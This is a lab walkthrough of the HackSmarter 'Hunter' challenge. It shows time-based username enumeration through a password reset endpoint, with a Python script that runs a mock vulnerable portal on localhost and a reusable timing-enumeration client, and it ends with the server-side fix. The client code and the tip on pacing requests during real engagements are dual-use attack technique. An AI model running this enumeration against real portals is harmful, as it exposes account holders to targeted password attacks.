HackSmarter Hunter Walkthrough (Easy)
Summary :
Hunter is an easy challenge from HackSmarter. We are given a list of usernames collected by the OSINT team and have to work out which of them are valid accounts on an enterprise portal. The portal looks secure at first: neither the login page nor the password reset page returns anything that distinguishes a valid user from an invalid one, so there is nothing to filter on. The password reset feature has a flaw, though: the server takes noticeably longer to respond when the username exists, and we can abuse that timing difference to build a list of valid usernames. Basically, time-based user enumeration, if you want to call it that :)
Solution :
If we navigate to the URL, we find a simple login page. The first thing I did was fuzz for other endpoints. Fuzzing turns up only two: the login page and a password reset page.
I tried fuzzing both of them for further directories and files, but nothing was found.
If we try to log in, the server gives nothing away: no error message that differs between a valid and an invalid username, so nothing to filter on.
Now let’s open Burp and make a few login requests to see what the request and response look like.
Next, let’s craft the same request in FFUF, fuzzing the username field with the OSINT list, and filter the responses to see whether any username produces a different status code, response length or word count.
That returns nothing useful. Now, remember the password reset page; we can try exactly the same thing against that endpoint.
Nothing useful there either: status, length and body are identical for every username. It seems pretty secure. One last thing to test: with password reset functionality, the server sometimes takes longer to respond for users that actually exist, because only for them does it do the extra work of generating and sending an OTP or reset link. Since the application does not implement any rate limiting, we can keep fuzzing and look at response times instead of response content. And we do find one response that takes about 1000 ms, compared with the 100 to 200 ms range we saw for everything else. That is a strong indicator that this user exists. A single slow response can also be network jitter, so repeat the request for that username a few times to confirm the delay is consistent before trusting it.
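To make the timing check concrete, here is an added example (not code from the challenge or its author): a small mock portal on localhost whose password reset handler returns the same status and body for every username but only does its expensive work for accounts that exist, plus a client that probes it the same way we probed the real one. The `/reset` path, the usernames, the `VALID_USERS` set and the delay values are all constructed for the demo. It goes a little beyond the walkthrough by taking several samples per username and measuring the baseline against usernames that cannot exist, which is what you want when the list is noisy.

```python
"""Timing-based username enumeration against a password reset endpoint.

Added example, not code from the HackSmarter challenge or its author. It
runs a mock portal on a loopback port whose /reset handler does extra work
(simulated with a sleep) only when the username exists, then probes it the
way we probed the real one. VALID_USERS, the delays, the usernames and the
/reset path are all constructed for the demonstration.
"""
import http.server
import statistics
import threading
import time
import urllib.request
from urllib.parse import parse_qs

VALID_USERS = {"alice", "bob"}   # constructed: accounts the mock portal knows
SLOW_DELAY = 0.30                # simulated "generate token and send mail" cost
FAST_DELAY = 0.02                # simulated cost of the unknown-user path


class ResetHandler(http.server.BaseHTTPRequestHandler):
    """Vulnerable handler: same status and body for everyone, but the
    expensive path only runs for existing users, so timing leaks existence."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode()
        user = parse_qs(body).get("username", [""])[0]
        time.sleep(SLOW_DELAY if user in VALID_USERS else FAST_DELAY)
        msg = b'{"message":"If that account exists, a reset link was sent."}'
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(msg)))
        self.end_headers()
        self.wfile.write(msg)

    def log_message(self, *args):
        pass  # keep the demo output quiet


def start_server():
    """Bind the mock portal to a free loopback port and serve in the background."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), ResetHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def time_reset(url, username, samples=3):
    """Median round-trip time in ms for one username.

    Several samples and a median, rather than a single request, so one
    jittery response does not produce a false positive."""
    data = f"username={username}".encode()
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    times = []
    for _ in range(samples):
        req = urllib.request.Request(url, data=data, headers=headers)
        t0 = time.perf_counter()
        with urllib.request.urlopen(req) as resp:
            resp.read()
        times.append((time.perf_counter() - t0) * 1000)
    return statistics.median(times)


def enumerate_users(url, candidates, factor=3.0):
    """Return (valid_usernames, timings).

    The baseline is measured with usernames that cannot exist, so the check
    still works even if most of the OSINT list turns out to be valid."""
    bogus = ["zz-does-not-exist-1", "zz-does-not-exist-2"]
    baseline = statistics.median(time_reset(url, b) for b in bogus)
    timings = {u: time_reset(url, u) for u in candidates}
    valid = sorted(u for u, t in timings.items() if t > baseline * factor)
    return valid, timings


def run_demo():
    """Start the mock portal, enumerate a constructed OSINT list, stop it."""
    srv = start_server()
    url = f"http://127.0.0.1:{srv.server_address[1]}/reset"
    try:
        return enumerate_users(url, ["alice", "carol", "bob", "dave", "erin"])
    finally:
        srv.shutdown()


if __name__ == "__main__":
    found, timings = run_demo()
    for user, ms in timings.items():
        flag = "  <- exists" if user in found else ""
        print(f"{user:>8}: {ms:7.1f} ms{flag}")
```

Running it prints the per-username medians, with the two constructed valid accounts standing out by roughly an order of magnitude, which is the same signal the duration column in FFUF's output gives you. On a real engagement, space the requests out and use more samples, since the gap is usually smaller than in this mock. The fix on the server side is to make both paths cost the same: respond immediately with the generic message and hand the token generation and email off to a background job, or otherwise ensure the unknown-user path does equivalent work.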
Just like that, we are able to enumerate valid usernames even though the web app never returns any useful information in its responses.